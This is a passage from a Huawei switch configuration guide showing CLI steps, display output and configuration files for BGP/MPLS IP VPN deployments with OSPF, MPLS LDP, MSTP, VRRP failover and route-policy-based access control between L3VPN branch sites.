[PE3-ospf-1-area-0.0.0.0] network 192.168.2.0 0.0.0.255
[PE3-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255
[PE3-ospf-1-area-0.0.0.0] network 3.3.3.3 0.0.0.0
[PE3-ospf-1-area-0.0.0.0] quit
[PE3-ospf-1] quit

Step 2 Configure basic MPLS functions, enable MPLS LDP, and establish LDP LSPs on the MPLS
backbone network.
# Configure PE1.
[PE1] mpls lsr-id 1.1.1.1
[PE1] mpls
[PE1-mpls] quit
[PE1] mpls ldp
[PE1-mpls-ldp] quit
[PE1] interface vlanif 300
[PE1-Vlanif300] mpls
[PE1-Vlanif300] mpls ldp
[PE1-Vlanif300] quit

# Configure PE2.
[PE2] mpls lsr-id 2.2.2.2
[PE2] mpls
[PE2-mpls] quit
[PE2] mpls ldp
[PE2-mpls-ldp] quit
[PE2] interface vlanif 200
[PE2-Vlanif200] mpls
[PE2-Vlanif200] mpls ldp
[PE2-Vlanif200] quit

# Configure PE3.
[PE3] mpls lsr-id 3.3.3.3
[PE3] mpls
[PE3-mpls] quit
[PE3] mpls ldp
[PE3-mpls-ldp] quit

[PE3] interface vlanif 200
[PE3-Vlanif200] mpls
[PE3-Vlanif200] mpls ldp
[PE3-Vlanif200] quit
[PE3] interface vlanif 300
[PE3-Vlanif300] mpls
[PE3-Vlanif300] mpls ldp
[PE3-Vlanif300] quit

Step 3 Configure a VPN instance on each PE and connect CEs to PEs.


# Configure the switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan 100
[Switch-vlan100] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type hybrid
[Switch-GigabitEthernet1/0/1] port hybrid pvid vlan 100
[Switch-GigabitEthernet1/0/1] port hybrid untagged vlan 100
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type hybrid
[Switch-GigabitEthernet1/0/2] port hybrid pvid vlan 100
[Switch-GigabitEthernet1/0/2] port hybrid untagged vlan 100
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface gigabitethernet 1/0/3
[Switch-GigabitEthernet1/0/3] port link-type hybrid
[Switch-GigabitEthernet1/0/3] port hybrid pvid vlan 100
[Switch-GigabitEthernet1/0/3] port hybrid untagged vlan 100
[Switch-GigabitEthernet1/0/3] quit

# Configure PE1.
[PE1] ip vpn-instance vpna
[PE1-vpn-instance-vpna] route-distinguisher 100:1
[PE1-vpn-instance-vpna-af-ipv4] vpn-target 111:1 both
[PE1-vpn-instance-vpna-af-ipv4] quit
[PE1-vpn-instance-vpna] quit
[PE1] vlan 100
[PE1-vlan100] quit
[PE1] interface gigabitethernet 1/0/2
[PE1-GigabitEthernet1/0/2] port link-type hybrid
[PE1-GigabitEthernet1/0/2] port hybrid pvid vlan 100
[PE1-GigabitEthernet1/0/2] port hybrid untagged vlan 100
[PE1-GigabitEthernet1/0/2] quit
[PE1] interface gigabitethernet 1/0/5
[PE1-GigabitEthernet1/0/5] port link-type hybrid
[PE1-GigabitEthernet1/0/5] port hybrid pvid vlan 100
[PE1-GigabitEthernet1/0/5] port hybrid untagged vlan 100
[PE1-GigabitEthernet1/0/5] quit
[PE1] interface vlanif 100
[PE1-Vlanif100] ip binding vpn-instance vpna
[PE1-Vlanif100] ip address 10.1.1.1 24
[PE1-Vlanif100] quit

# Configure PE2.
[PE2] ip vpn-instance vpna
[PE2-vpn-instance-vpna] route-distinguisher 100:1
[PE2-vpn-instance-vpna-af-ipv4] vpn-target 111:1 both
[PE2-vpn-instance-vpna-af-ipv4] quit
[PE2-vpn-instance-vpna] quit
[PE2] vlan 100
[PE2-vlan100] quit
[PE2] interface gigabitethernet 1/0/2
[PE2-GigabitEthernet1/0/2] port link-type hybrid
[PE2-GigabitEthernet1/0/2] port hybrid pvid vlan 100
[PE2-GigabitEthernet1/0/2] port hybrid untagged vlan 100

[PE2-GigabitEthernet1/0/2] quit
[PE2] interface gigabitethernet 1/0/5
[PE2-GigabitEthernet1/0/5] port link-type hybrid
[PE2-GigabitEthernet1/0/5] port hybrid pvid vlan 100
[PE2-GigabitEthernet1/0/5] port hybrid untagged vlan 100
[PE2-GigabitEthernet1/0/5] quit
[PE2] interface vlanif 100
[PE2-Vlanif100] ip binding vpn-instance vpna
[PE2-Vlanif100] ip address 10.1.1.2 24
[PE2-Vlanif100] quit

# Configure PE3.
[PE3] ip vpn-instance vpna
[PE3-vpn-instance-vpna] route-distinguisher 100:1
[PE3-vpn-instance-vpna-af-ipv4] vpn-target 111:1 both
[PE3-vpn-instance-vpna-af-ipv4] quit
[PE3-vpn-instance-vpna] quit
[PE3] vlan 400
[PE3-vlan400] quit
[PE3] interface gigabitethernet 1/0/3
[PE3-GigabitEthernet1/0/3] port link-type hybrid
[PE3-GigabitEthernet1/0/3] port hybrid pvid vlan 400
[PE3-GigabitEthernet1/0/3] port hybrid untagged vlan 400
[PE3-GigabitEthernet1/0/3] quit
[PE3] interface vlanif 400
[PE3-Vlanif400] ip binding vpn-instance vpna
[PE3-Vlanif400] ip address 172.16.1.100 24
[PE3-Vlanif400] quit

# Configure CE1.
<HUAWEI> system-view
[HUAWEI] sysname CE1
[CE1] vlan 100
[CE1-vlan100] quit
[CE1] interface gigabitethernet 1/0/3
[CE1-GigabitEthernet1/0/3] port link-type hybrid
[CE1-GigabitEthernet1/0/3] port hybrid pvid vlan 100
[CE1-GigabitEthernet1/0/3] port hybrid untagged vlan 100
[CE1-GigabitEthernet1/0/3] quit
[CE1] interface vlanif 100
[CE1-Vlanif100] ip address 10.1.1.100 24
[CE1-Vlanif100] quit

# Configure CE2.
<HUAWEI> system-view
[HUAWEI] sysname CE2
[CE2] vlan 400
[CE2-vlan400] quit
[CE2] interface gigabitethernet 1/0/3
[CE2-GigabitEthernet1/0/3] port link-type hybrid
[CE2-GigabitEthernet1/0/3] port hybrid pvid vlan 400
[CE2-GigabitEthernet1/0/3] port hybrid untagged vlan 400
[CE2-GigabitEthernet1/0/3] quit
[CE2] interface vlanif 400
[CE2-Vlanif400] ip address 172.16.1.200 24
[CE2-Vlanif400] quit

Step 4 Set up EBGP peer relationships between PEs and CEs and import VPN routes.
# Configure CE1.
[CE1] bgp 65410
[CE1-bgp] peer 10.1.1.111 as-number 100
[CE1-bgp] import-route direct
[CE1-bgp] quit

# Configure CE2.

[CE2] bgp 65430
[CE2-bgp] peer 172.16.1.100 as-number 100
[CE2-bgp] import-route direct
[CE2-bgp] quit

# Configure PE1.
[PE1] bgp 100
[PE1-bgp] ipv4-family vpn-instance vpna
[PE1-bgp-vpna] peer 10.1.1.100 as-number 65410
[PE1-bgp-vpna] import-route direct
[PE1-bgp-vpna] quit
[PE1-bgp] quit

# Configure PE2.
[PE2] bgp 100
[PE2-bgp] ipv4-family vpn-instance vpna
[PE2-bgp-vpna] peer 10.1.1.100 as-number 65410
[PE2-bgp-vpna] import-route direct
[PE2-bgp-vpna] quit
[PE2-bgp] quit

# Configure PE3.
[PE3] bgp 100
[PE3-bgp] ipv4-family vpn-instance vpna
[PE3-bgp-vpna] peer 172.16.1.200 as-number 65430
[PE3-bgp-vpna] import-route direct
[PE3-bgp-vpna] quit
[PE3-bgp] quit

Step 5 Set up MP-IBGP peer relationships between PEs.


# Configure PE1.
[PE1] bgp 100
[PE1-bgp] peer 3.3.3.3 as-number 100
[PE1-bgp] peer 3.3.3.3 connect-interface loopback 1
[PE1-bgp] ipv4-family vpnv4
[PE1-bgp-af-vpnv4] peer 3.3.3.3 enable
[PE1-bgp-af-vpnv4] quit
[PE1-bgp] quit

# Configure PE2.
[PE2] bgp 100
[PE2-bgp] peer 3.3.3.3 as-number 100
[PE2-bgp] peer 3.3.3.3 connect-interface loopback 1
[PE2-bgp] ipv4-family vpnv4
[PE2-bgp-af-vpnv4] peer 3.3.3.3 enable
[PE2-bgp-af-vpnv4] quit
[PE2-bgp] quit

# Configure PE3.
[PE3] bgp 100
[PE3-bgp] peer 1.1.1.1 as-number 100
[PE3-bgp] peer 2.2.2.2 as-number 100
[PE3-bgp] peer 1.1.1.1 connect-interface loopback 1
[PE3-bgp] peer 2.2.2.2 connect-interface loopback 1
[PE3-bgp] ipv4-family vpnv4
[PE3-bgp-af-vpnv4] peer 1.1.1.1 enable
[PE3-bgp-af-vpnv4] peer 2.2.2.2 enable
[PE3-bgp-af-vpnv4] quit
[PE3-bgp] quit

Step 6 Configure MSTP to block the link between PE2 and the switch and prevent loops.
# Configure PE1 to work in MSTP mode.

[PE1] stp mode mstp

# Configure PE2 to work in MSTP mode.


[PE2] stp mode mstp

# Configure the switch to work in MSTP mode.


[Switch] stp mode mstp

# Configure PE1 as the root bridge.


[PE1] stp root primary

# Configure PE2 as the secondary root bridge.


[PE2] stp root secondary

# Set the path cost of the port connecting PE2 and the switch to 400000 to block the link
between PE2 and the switch.
[PE2] interface gigabitethernet 1/0/2
[PE2-GigabitEthernet1/0/2] stp cost 400000
[PE2-GigabitEthernet1/0/2] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] stp cost 400000
[Switch-GigabitEthernet1/0/2] quit

# Disable STP on GigabitEthernet1/0/3, which connects the switch and CE1.


[Switch] interface gigabitethernet 1/0/3
[Switch-GigabitEthernet1/0/3] stp disable
[Switch-GigabitEthernet1/0/3] quit

# Enable STP on PE1 globally.


[PE1] stp enable

# Enable STP on PE2 globally.


[PE2] stp enable

# Enable STP on the switch globally.


[Switch] stp enable

# After the configuration is complete, run the display stp brief command on the switch. You
can see that GE1/0/2 is the alternate port and in DISCARDING state.
[Switch] display stp brief
MSTID Port Role STP State Protection
0 GigabitEthernet1/0/1 ROOT FORWARDING NONE
0 GigabitEthernet1/0/2 ALTE DISCARDING NONE

Step 7 Configure a VRRP group.

# Configure VRRP group 1 on PE1, and set the priority of PE1 to 120 and the preemption
delay to 20s.
[PE1] interface vlanif 100
[PE1-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.111 //Create VRRP group 1.
[PE1-Vlanif100] vrrp vrid 1 priority 120 //Set the priority to 120.
[PE1-Vlanif100] vrrp vrid 1 preempt-mode timer delay 20 //Set the preemption
delay to 20s.
[PE1-Vlanif100] quit

# Configure VRRP group 1 on PE2. PE2 uses the default priority of 100.

[PE2] interface vlanif 100
[PE2-Vlanif100] vrrp vrid 1 virtual-ip 10.1.1.111 //Create VRRP group 1.
[PE2-Vlanif100] quit

Step 8 Verify the configuration.


# After the configuration is complete, run the display vrrp command on PE1 and PE2. You
can see that PE1 is in Master state and PE2 is in Backup state.
[PE1] display vrrp
Vlanif100 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.111
Master IP : 10.1.1.1
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
[PE2] display vrrp
Vlanif100 | Virtual Router 1
State : Backup
Virtual IP : 10.1.1.111
Master IP : 10.1.1.1
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46

# Run the shutdown command on GE1/0/2 and GE1/0/5 of PE1 to simulate a link fault.
[PE1] interface gigabitethernet 1/0/2
[PE1-GigabitEthernet1/0/2] shutdown
[PE1-GigabitEthernet1/0/2] quit
[PE1] interface gigabitethernet 1/0/5
[PE1-GigabitEthernet1/0/5] shutdown
[PE1-GigabitEthernet1/0/5] quit

# Run the display vrrp command on PE2 to check the VRRP status. The command output
shows that PE2 is in Master state.
[PE2] display vrrp
Vlanif100 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.111
Master IP : 10.1.1.2
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 100
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s


Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:18:40

# Run the undo shutdown command on GE1/0/2 and GE1/0/5 of PE1. After 20s (the preemption
delay), run the display vrrp command on PE1 to check the VRRP status. PE1 has returned to the Master state.
[PE1] interface gigabitethernet 1/0/2
[PE1-GigabitEthernet1/0/2] undo shutdown
[PE1-GigabitEthernet1/0/2] quit
[PE1] interface gigabitethernet 1/0/5
[PE1-GigabitEthernet1/0/5] undo shutdown
[PE1-GigabitEthernet1/0/5] quit
[PE1] display vrrp
Vlanif100 | Virtual Router 1
State : Master
Virtual IP : 10.1.1.111
Master IP : 10.1.1.1
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:20:56

----End

Configuration Files
l Configuration file of PE1
#
sysname PE1
#
vlan batch 100 300
#
stp instance 0 root primary
ip vpn-instance vpna
ipv4-family
route-distinguisher 100:1
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
#
mpls lsr-id 1.1.1.1
mpls
#
mpls ldp
#
interface Vlanif100
ip binding vpn-instance vpna
ip address 10.1.1.1 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.111
vrrp vrid 1 priority 120
vrrp vrid 1 preempt-mode timer delay 20
#
interface Vlanif300
ip address 192.168.1.1 255.255.255.0
mpls


mpls ldp
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 300
port hybrid untagged vlan 300
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
interface GigabitEthernet1/0/5
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
interface LoopBack1
ip address 1.1.1.1 255.255.255.255
#
bgp 100
peer 3.3.3.3 as-number 100
peer 3.3.3.3 connect-interface LoopBack1
#
ipv4-family unicast
undo synchronization
peer 3.3.3.3 enable
#
ipv4-family vpnv4
policy vpn-target
peer 3.3.3.3 enable
#
ipv4-family vpn-instance vpna
import-route direct
peer 10.1.1.100 as-number 65410
#
ospf 1
area 0.0.0.0
network 1.1.1.1 0.0.0.0
network 192.168.1.0 0.0.0.255
#
return
l Configuration file of PE2
#
sysname PE2
#
vlan batch 100 200
#
stp instance 0 root secondary
ip vpn-instance vpna
ipv4-family
route-distinguisher 100:1
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
#
mpls lsr-id 2.2.2.2
mpls
#
mpls ldp
#
interface Vlanif100
ip binding vpn-instance vpna
ip address 10.1.1.2 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.1.111
#
interface Vlanif200
ip address 192.168.2.1 255.255.255.0
mpls
mpls ldp


#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 200
port hybrid untagged vlan 200
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
stp instance 0 cost 400000
#
interface GigabitEthernet1/0/5
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
interface LoopBack1
ip address 2.2.2.2 255.255.255.255
#
bgp 100
peer 3.3.3.3 as-number 100
peer 3.3.3.3 connect-interface LoopBack1
#
ipv4-family unicast
undo synchronization
peer 3.3.3.3 enable
#
ipv4-family vpnv4
policy vpn-target
peer 3.3.3.3 enable
#
ipv4-family vpn-instance vpna
import-route direct
peer 10.1.1.100 as-number 65410
#
ospf 1
area 0.0.0.0
network 2.2.2.2 0.0.0.0
network 192.168.2.0 0.0.0.255
#
return
l Configuration file of PE3
#
sysname PE3
#
vlan batch 200 300 400
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 100:1
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
#
mpls lsr-id 3.3.3.3
mpls
#
mpls ldp
#
interface Vlanif200
ip address 192.168.2.2 255.255.255.0
mpls
mpls ldp
#
interface Vlanif300
ip address 192.168.1.2 255.255.255.0
mpls
mpls ldp
#


interface Vlanif400
ip binding vpn-instance vpna
ip address 172.16.1.100 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 300
port hybrid untagged vlan 300
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 200
port hybrid untagged vlan 200
#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid pvid vlan 400
port hybrid untagged vlan 400
#
interface LoopBack1
ip address 3.3.3.3 255.255.255.255
#
bgp 100
peer 1.1.1.1 as-number 100
peer 1.1.1.1 connect-interface LoopBack1
peer 2.2.2.2 as-number 100
peer 2.2.2.2 connect-interface LoopBack1
#
ipv4-family unicast
undo synchronization
peer 1.1.1.1 enable
peer 2.2.2.2 enable
#
ipv4-family vpnv4
policy vpn-target
peer 1.1.1.1 enable
peer 2.2.2.2 enable
#
ipv4-family vpn-instance vpna
import-route direct
peer 172.16.1.200 as-number 65430
#
ospf 1
area 0.0.0.0
network 3.3.3.3 0.0.0.0
network 192.168.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return
l Configuration file of the switch
#
sysname Switch
#
vlan batch 100
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
stp instance 0 cost 400000
#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid pvid vlan 100


port hybrid untagged vlan 100
stp disable
#
return

l Configuration file of CE1
#
sysname CE1
#
vlan batch 100
#
interface Vlanif100
ip address 10.1.1.100 255.255.255.0
#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
bgp 65410
peer 10.1.1.111 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 10.1.1.111 enable
#
return

l Configuration file of CE2
#
sysname CE2
#
vlan batch 400
#
interface Vlanif400
ip address 172.16.1.200 255.255.255.0
#
interface GigabitEthernet1/0/3
port link-type hybrid
port hybrid pvid vlan 400
port hybrid untagged vlan 400
#
bgp 65430
peer 172.16.1.100 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 172.16.1.100 enable
#
return

14.1.5 Example for Configuring Routing Policies to Control Mutual Access Between L3VPN Users

Overview
BGP/MPLS IP VPN is an MPLS-based L3VPN that can be flexibly deployed and easily extended,
which makes it suitable for large-scale deployment. BGP/MPLS IP VPN technology can be used to
implement secure communication between, or isolation of, branches in different locations.

Routing policies filter routes and set route attributes. Changing the attributes of a route
changes the path over which network traffic is forwarded.


BGP/MPLS IP VPN can be combined with routing policies to control the receiving and
advertisement of VPN routes, implementing mutual access between specific branch users.

Configuration Notes
l The SA series cards do not support the BGP/MPLS IP VPN function. The X1E series
cards of V200R006C00 and later versions support the BGP/MPLS IP VPN function.
l This example applies to all versions of the S12700 switches.
NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 14-5, CE1 is connected to the branch Site 1, and CE2 is connected to the
branch Site 2. Site 1 and Site 2 communicate with each other over the ISP backbone network.
The enterprise requires that L3VPN users on some network segments can securely
communicate with each other to meet service requirements.

Figure 14-5 Configuring routing policies to control mutual access between L3VPN users
(Topology: CE1 (Site1) - PE1 - VPN backbone - PE2 - CE2 (Site2); both sites belong to vpna)

Device Interface VLANIF Interface IP Address
PE1 Loopback1 - 1.1.1.9/32
PE1 GE2/0/0 VLANIF100 172.10.1.1/24
PE1 GE1/0/0 VLANIF10 192.168.1.1/24
PE2 Loopback1 - 2.2.2.9/32
PE2 GE2/0/0 VLANIF100 172.10.1.2/24
PE2 GE1/0/0 VLANIF10 192.168.2.1/24
CE1 GE1/0/0 VLANIF10 192.168.1.2/24
CE2 GE1/0/0 VLANIF10 192.168.2.2/24

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure OSPF between the PE devices to ensure IP connectivity on the backbone network.
2. Enable basic MPLS capabilities and MPLS LDP on the PE devices to set up MPLS LSP
tunnels for VPN data transmission on the backbone network.


3. Create VPN instances on the PE devices, bind CE interfaces to the VPN instances, and
assign different VPN targets to the VPN instances to isolate users from different
branches.
4. Configure routing policies on the PE devices and change the VPN targets of routes
filtered out based on specified routing policies to implement communication between
branch users on a specified network segment.
5. Set up EBGP peer relationships between the CE and PE devices so that they can
exchange VPN routing information.
6. Configure MP-IBGP between the PE devices to enable them to exchange VPN routing
information.

Procedure
Step 1 Configure an IGP protocol on the MPLS backbone network so that the PE devices can
communicate with each other.
# Configure PE1.
<HUAWEI> system-view
[HUAWEI] sysname PE1
[PE1] interface loopback 1
[PE1-LoopBack1] ip address 1.1.1.9 32
[PE1-LoopBack1] quit
[PE1] vlan batch 10 100
[PE1] interface gigabitethernet 1/0/0
[PE1-GigabitEthernet1/0/0] port link-type trunk
[PE1-GigabitEthernet1/0/0] port trunk allow-pass vlan 10
[PE1-GigabitEthernet1/0/0] quit
[PE1] interface gigabitethernet 2/0/0
[PE1-GigabitEthernet2/0/0] port link-type trunk
[PE1-GigabitEthernet2/0/0] port trunk allow-pass vlan 100
[PE1-GigabitEthernet2/0/0] quit
[PE1] interface vlanif 100
[PE1-Vlanif100] ip address 172.10.1.1 24
[PE1-Vlanif100] quit
[PE1] ospf 1
[PE1-ospf-1] area 0
[PE1-ospf-1-area-0.0.0.0] network 172.10.1.0 0.0.0.255
[PE1-ospf-1-area-0.0.0.0] network 1.1.1.9 0.0.0.0
[PE1-ospf-1-area-0.0.0.0] quit
[PE1-ospf-1] quit

# Configure PE2.
<HUAWEI> system-view
[HUAWEI] sysname PE2
[PE2] interface loopback 1
[PE2-LoopBack1] ip address 2.2.2.9 32
[PE2-LoopBack1] quit
[PE2] vlan batch 10 100
[PE2] interface gigabitethernet 1/0/0
[PE2-GigabitEthernet1/0/0] port link-type trunk
[PE2-GigabitEthernet1/0/0] port trunk allow-pass vlan 10
[PE2-GigabitEthernet1/0/0] quit
[PE2] interface gigabitethernet 2/0/0
[PE2-GigabitEthernet2/0/0] port link-type trunk
[PE2-GigabitEthernet2/0/0] port trunk allow-pass vlan 100
[PE2-GigabitEthernet2/0/0] quit
[PE2] interface vlanif 100
[PE2-Vlanif100] ip address 172.10.1.2 24
[PE2-Vlanif100] quit
[PE2] ospf 1
[PE2-ospf-1] area 0
[PE2-ospf-1-area-0.0.0.0] network 172.10.1.0 0.0.0.255


[PE2-ospf-1-area-0.0.0.0] network 2.2.2.9 0.0.0.0
[PE2-ospf-1-area-0.0.0.0] quit
[PE2-ospf-1] quit

After the configuration is complete, run the display ospf peer command. The command
output shows that an OSPF neighbor relationship has been set up between PE1 and PE2 and that
the neighbor status is Full. Run the display ip routing-table command on PE1 and PE2; the
output shows that PE1 and PE2 have learned the routes to each other's Loopback1 address.
Step 2 Enable basic MPLS capabilities and MPLS LDP on the PE devices to set up LDP LSPs on the
MPLS backbone network.
# Configure PE1.
[PE1] mpls lsr-id 1.1.1.9
[PE1] mpls
[PE1-mpls] quit
[PE1] mpls ldp
[PE1-mpls-ldp] quit
[PE1] interface vlanif 100
[PE1-Vlanif100] mpls
[PE1-Vlanif100] mpls ldp
[PE1-Vlanif100] quit

# Configure PE2.
[PE2] mpls lsr-id 2.2.2.9
[PE2] mpls
[PE2-mpls] quit
[PE2] mpls ldp
[PE2-mpls-ldp] quit
[PE2] interface vlanif 100
[PE2-Vlanif100] mpls
[PE2-Vlanif100] mpls ldp
[PE2-Vlanif100] quit

After the configuration is complete, PE1 and PE2 have established an LDP session. Run the
display mpls ldp session command; the output shows that the LDP session status is
Operational.
Step 3 Configure a VPN instance on each PE device and connect the CE devices to the PE devices.
# Configure PE1.
[PE1] ip vpn-instance vpna
[PE1-vpn-instance-vpna] route-distinguisher 100:1
[PE1-vpn-instance-vpna-af-ipv4] vpn-target 111:1 both
[PE1-vpn-instance-vpna-af-ipv4] quit
[PE1-vpn-instance-vpna] quit
[PE1] interface vlanif 10
[PE1-Vlanif10] ip binding vpn-instance vpna
[PE1-Vlanif10] ip address 192.168.1.1 24
[PE1-Vlanif10] quit

# Configure PE2.
[PE2] ip vpn-instance vpna
[PE2-vpn-instance-vpna] route-distinguisher 200:1
[PE2-vpn-instance-vpna-af-ipv4] vpn-target 222:1 both
[PE2-vpn-instance-vpna-af-ipv4] quit
[PE2-vpn-instance-vpna] quit
[PE2] interface vlanif 10
[PE2-Vlanif10] ip binding vpn-instance vpna
[PE2-Vlanif10] ip address 192.168.2.1 24
[PE2-Vlanif10] quit

# Assign IP addresses to interfaces on CE1 and CE2 according to Figure 14-5.


<HUAWEI> system-view
[HUAWEI] sysname CE1
[CE1] vlan batch 10
[CE1] interface gigabitethernet 1/0/0
[CE1-GigabitEthernet1/0/0] port link-type trunk
[CE1-GigabitEthernet1/0/0] port trunk allow-pass vlan 10
[CE1-GigabitEthernet1/0/0] quit
[CE1] interface vlanif 10
[CE1-Vlanif10] ip address 192.168.1.2 24
[CE1-Vlanif10] quit
<HUAWEI> system-view
[HUAWEI] sysname CE2
[CE2] vlan batch 10
[CE2] interface gigabitethernet 1/0/0
[CE2-GigabitEthernet1/0/0] port link-type trunk
[CE2-GigabitEthernet1/0/0] port trunk allow-pass vlan 10
[CE2-GigabitEthernet1/0/0] quit
[CE2] interface vlanif 10
[CE2-Vlanif10] ip address 192.168.2.2 24
[CE2-Vlanif10] quit

After the configuration is complete, run the display ip vpn-instance verbose command on
PE1 and PE2 to view VPN instance configuration. The PE devices can ping local CE devices
attached to them.

NOTE

If a PE device has multiple interfaces bound to the same VPN instance, you need to specify a source IP
address when pinging the CE device connected to the remote PE device. To specify the source IP
address, set the -a source-ip-address parameter in the ping -vpn-instance vpn-instance-name -a source-
ip-address dest-ip-address command. If no source IP address is specified, the ping operation fails.

Step 4 Configure routing policies.

# Configure PE1.
[PE1] ip ip-prefix ipPrefix1 index 10 permit 192.168.1.0 24 greater-equal 24 less-equal 32
[PE1] route-policy vpnroute permit node 1
[PE1-route-policy] if-match ip-prefix ipPrefix1
[PE1-route-policy] apply extcommunity rt 222:1
[PE1-route-policy] quit
[PE1] ip vpn-instance vpna
[PE1-vpn-instance-vpna] export route-policy vpnroute
[PE1-vpn-instance-vpna] quit

# Configure PE2.
[PE2] ip ip-prefix ipPrefix1 index 10 permit 192.168.2.0 24 greater-equal 24 less-equal 32
[PE2] route-policy vpnroute permit node 1
[PE2-route-policy] if-match ip-prefix ipPrefix1
[PE2-route-policy] apply extcommunity rt 111:1
[PE2-route-policy] quit
[PE2] ip vpn-instance vpna
[PE2-vpn-instance-vpna] export route-policy vpnroute
[PE2-vpn-instance-vpna] quit

Step 5 Set up EBGP peer relationships between the PE and CE devices and import VPN routes.

# Configure CE1. The configuration of CE2 is similar to that of CE1 and is not shown
here.
[CE1] bgp 65410
[CE1-bgp] peer 192.168.1.1 as-number 100
[CE1-bgp] import-route direct
[CE1-bgp] quit


# Configure PE1. The configuration of PE2 is similar to that of PE1 and is not shown
here.
[PE1] bgp 100
[PE1-bgp] ipv4-family vpn-instance vpna
[PE1-bgp-vpna] peer 192.168.1.2 as-number 65410
[PE1-bgp-vpna] import-route direct
[PE1-bgp-vpna] quit
[PE1-bgp] quit

After the configuration is complete, run the display bgp vpnv4 vpn-instance vpna peer
command on PE1 and PE2. The output shows that the BGP peer relationships between the PE and
CE devices are in the Established state.

Step 6 Set up an MP-IBGP peer relationship between PE1 and PE2.

# Configure PE1.
[PE1] bgp 100
[PE1-bgp] peer 2.2.2.9 as-number 100
[PE1-bgp] peer 2.2.2.9 connect-interface loopback 1
[PE1-bgp] ipv4-family vpnv4
[PE1-bgp-af-vpnv4] peer 2.2.2.9 enable
[PE1-bgp-af-vpnv4] quit
[PE1-bgp] quit

# Configure PE2.
[PE2] bgp 100
[PE2-bgp] peer 1.1.1.9 as-number 100
[PE2-bgp] peer 1.1.1.9 connect-interface loopback 1
[PE2-bgp] ipv4-family vpnv4
[PE2-bgp-af-vpnv4] peer 1.1.1.9 enable
[PE2-bgp-af-vpnv4] quit
[PE2-bgp] quit

After the configuration is complete, run the display bgp peer or display bgp vpnv4 all peer
command on PE1 and PE2. The output shows that the BGP peer relationship between the PE
devices is in the Established state.

Step 7 Verify the configuration.

# Run the ping -vpn-instance command on PE1 and PE2. You can successfully ping the CE
site that is attached to the peer PE device.

The display on PE1 is used as an example:
[PE1] ping -vpn-instance vpna 192.168.2.2
PING 192.168.2.2: 56 data bytes, press CTRL_C to break
Reply from 192.168.2.2: bytes=56 Sequence=1 ttl=254 time=6 ms
Reply from 192.168.2.2: bytes=56 Sequence=2 ttl=254 time=5 ms
Reply from 192.168.2.2: bytes=56 Sequence=3 ttl=254 time=7 ms
Reply from 192.168.2.2: bytes=56 Sequence=4 ttl=254 time=6 ms
Reply from 192.168.2.2: bytes=56 Sequence=5 ttl=254 time=5 ms

--- 192.168.2.2 ping statistics ---
5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 5/5/7 ms

----End


Configuration Files
l Configuration file of PE1
#
sysname PE1
#
vlan batch 10 100
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 100:1
export route-policy vpnroute
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
